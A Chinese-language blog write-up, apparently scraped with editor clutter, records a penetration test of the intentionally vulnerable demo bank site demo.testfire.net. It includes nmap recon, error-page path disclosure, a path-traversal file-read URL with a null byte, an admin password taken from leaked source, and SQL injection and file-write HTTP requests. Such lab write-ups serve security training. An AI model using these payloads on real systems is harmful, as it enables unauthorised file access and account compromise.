demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

IP 端口信息

65.61.137.117

 
 
 
1
 
 
 
 
 
1
65.61.137.117
2














 


 








 


nmap 信息


root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s


TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117








2




Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT








3




Nmap scan report for 65.61.137.117








4




Host is up (0.60s latency).








5




Not shown: 995 closed ports








6




PORT     STATE    SERVICE      VERSION








7




80/tcp   open     http         Microsoft IIS httpd 8.0








8




| http-cookie-flags: 








9




|   /: 








10




|     amSessionId: 








11




|_      httponly flag not set








12




| http-methods: 








13




|_  Potentially risky methods: TRACE








14




|_http-server-header: Microsoft-IIS/8.0








15




|_http-title: Altoro Mutual








16




443/tcp  open     ssl/http     Microsoft IIS httpd 8.0








17




| http-cookie-flags: 








18




|   /: 








19




|     amSessionId: 








20




|_      httponly flag not set








21




| http-methods: 








22




|_  Potentially risky methods: TRACE








23




|_http-server-header: Microsoft-IIS/8.0








24




|_http-title: Altoro Mutual








25




| ssl-cert: Subject: commonName=demo.testfire.net








26




| Not valid before: 2014-07-01T09:54:37








27




|_Not valid after:  2019-12-22T09:54:37








28




|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.








29




445/tcp  filtered microsoft-ds








30




514/tcp  filtered shell








31




4444/tcp filtered krb524








32




Device type: general purpose








33




Running: Microsoft Windows XP|7|2012








34




OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012








35




OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012








36




Network Distance: 2 hops








37




Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows








38












39




Host script results:








40




|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s








41












42




TRACEROUTE (using port 1723/tcp)








43




HOP RTT      ADDRESS








44




1   5.10 ms  192.168.245.2








45




2   26.32 ms 65.61.137.117








46












47




OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .








48




Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds








49


















 


 








中间件


root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/








2




http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]














 


 








总结




  • windows 服务器 , asp.net (aspx) . iis8
    • 

  • 靶机网站, 域名, cdn 等信息无需搜集




 


漏洞挖掘


错误日志,泄露物理路径


GET 请求访问 http://demo.testfire.net/comment.aspx






 


 


 












 


 


 




 








 


 




1




An Error Has Occurred








2




Summary:








3




Value cannot be null.








4












5




Error Message:








6




System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


疑似程序路径


c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31




 


 


 














x




 


 




 








 


 




1




c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31














 


 








 


登录处无验证码 ( maybe 暴力破解)






 


 


 














x




 


 




 








 


 




1




http://www.altoromutual.com/bank/login.aspx














 


 








 


任意文件内容读取


 


查看 login.aspx 的源代码






 


 


 














x




 


 




 








 


 




1




http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt














 


 








给出不存在的文件会报出目录信息


Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)




 


 


 












 


 


 




 








 


 




1




Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








2




        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.








3




            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








4




            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)








5




            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)








6




            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)








7




            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)








8




            at System.IO.StreamReader..ctor(String path)








9




            at System.IO.File.OpenText(String path)








10




            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42








11




            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70








12




            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)








13




            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)








14




            at System.Web.UI.Control.OnLoad(EventArgs e)








15




            at System.Web.UI.Control.LoadRecursive()








16




            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


读取 /admin/login.aspx 的源码 拿到 管理员的密码


if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")




 


 


 














x




 


 




 








 


 




1




if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 














 


 








SQL 注入


POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close


uid=hac425%27&passw=%27%27%27&btnSubmit=Login




 


 


 












 


 


 




 








 


 




1




POST /bank/login.aspx HTTP/1.1








2




Host: demo.testfire.net








3




Content-Length: 45








4




Cache-Control: max-age=0








5




Origin: http://demo.testfire.net








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://demo.testfire.net/bank/login.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288








14




Connection: close








15












16




uid=hac425%27&passw=%27%27%27&btnSubmit=Login














 


 








 


写文件


貌似只能写 txt , 写 aspx 访问不了


POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close


cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+




 


 


 














x




 


 




 








 


 




1




POST /comment.aspx HTTP/1.1








2




Host: www.altoromutual.com








3




Content-Length: 111








4




Cache-Control: max-age=0








5




Origin: http://www.altoromutual.com








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://www.altoromutual.com/feedback.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004








14




Connection: close








15












16




cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+














 


 








 


 


 


 


 


 


 


 


 
												


											
demo.testfire.net 靶场测试流程记录的更多相关文章
	

    
								
  1. 利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库)
		
    利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
    
		
    2. 
						
  2. 互联网App应用程序测试流程及测试总结
		
    互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图 仍然为测试环境 Pass 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
    
		
    3. 
						
  3. web测试流程的总结及关注点
		
    项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档 一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
    
		
    4. 
						
  4. 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程
		
    转自:http://www.51testing.com/html/80/n-3726980.html   抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程 发表于:2018-6-06 11: ...
    
		
    5. 
						
  5. web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
		
    回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标 掌握WAMP的环境搭建 掌握熟悉项目的步骤 ...
    
		
    6. 
						
  6. APP测试流程梳理
		
    APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
    
		
    7. 
						
  7. 【转载】基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)——介绍、安装准备、安装、config文件以及运行脚本介绍
		
    基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍 其他 2018-0 ...
    
		
    8. 
						
  8. ltp 测试流程及测试脚本分析
		
    LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试 杂谈 分类: linux测试 LTP介绍 一.LTP介绍1.简介LTP(Linux Test Pr ...
    
		
    9. 
						
  9. 【腾讯优测干货分享】如何降低App的待机内存(二)——规范测试流程及常见问题
		
    本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. h5仿微信、支付宝数字键盘|微信支付键盘|支付宝付款键盘
			
    html5仿微信支付数字键盘|仿支付宝键盘|h5仿微信密码输入键盘|自定义数字键盘 很早之前由于项目需求,就有开发过一个h5仿微信支付键盘,这几天就把之前的数字键盘模块独立出来,重新整理开发成demo ...
    
			
    2. 
						
  2. 最小化或关闭Outlook2013到系统托盘
			
    https://community.spiceworks.com/how_to/36214-minimize-and-or-close-outlook-to-taskbar 要注意里面提到的以管理员权 ...
    
			
    3. 
						
  3. Mina的服务器
			
    (一) package testMina; import java.io.IOException; import java.net.InetSocketAddress; import java.nio ...
    
			
    4. 
						
  4. 图形学  shader教程推荐
			
    https://www.bilibili.com/video/av37119580  http://edu.manew.com/my/course/96 http://edu.manew.com/my ...
    
			
    5. 
						
  5. 【Express系列】第4篇——使用session
			
    session 在 web 应用中使用很普遍,不过在 node 上面,要用 session 还真得折腾一番才行. 从加入中间件,到 session 的写入.清除,当时是遇到了不少坑的. 当然也可能是我 ...
    
			
    6. 
						
  6. CSS的定位问题总结
			
    CSS 定位和浮动 CSS 为定位和浮动提供了一些属性,利用这些属性,可以建立列式布局,将布局的一部分与另一部分重叠,还可以完成多年来通常需要使用多个表格才能完成的任务. 定位的基本思想很简单,它允许 ...
    
			
    7. 
						
  7. Automapper问题记录
			
    在Automapper使用中会碰到一些未能映射或者错误的问题,这些问题可能会经常忘记如何处理,想到一些就记录一些: 映射值有时为空又不报错的情况 这很可能是由于目标类中的部分属性有问题导致的,最简单的 ...
    
			
    8. 
						
  8. jQuery.on() 函数
			
    1.绑定所有的<p>元素// 为所有P元素分别绑定click事件处理函数handler$("p").on("click", handler); 2. ...
    
			
    9. 
						
  9. PowerDesigner中利用数据库表反向生成PDM(jdk必须是32位)
			
    第一步:创建一个空的PDM模型(选择对应的DBMS):File-->New 第二步:选择DataBase-->Configure Connections,配置即将连接的数据库 第三步:选择 ...
    
			
    10. 
						
  10. UML——六大关系整理
			
    UML——六大关系整理 1.定义 是一种面向对象的建模语言,它是运用统一的.标准化的标记和定义实现对软件系统进行面向对象的描述和建模(百度百科). 2.六种关系 这六种关系分别为,继承.实现.关联.聚 ...
    
			
    11.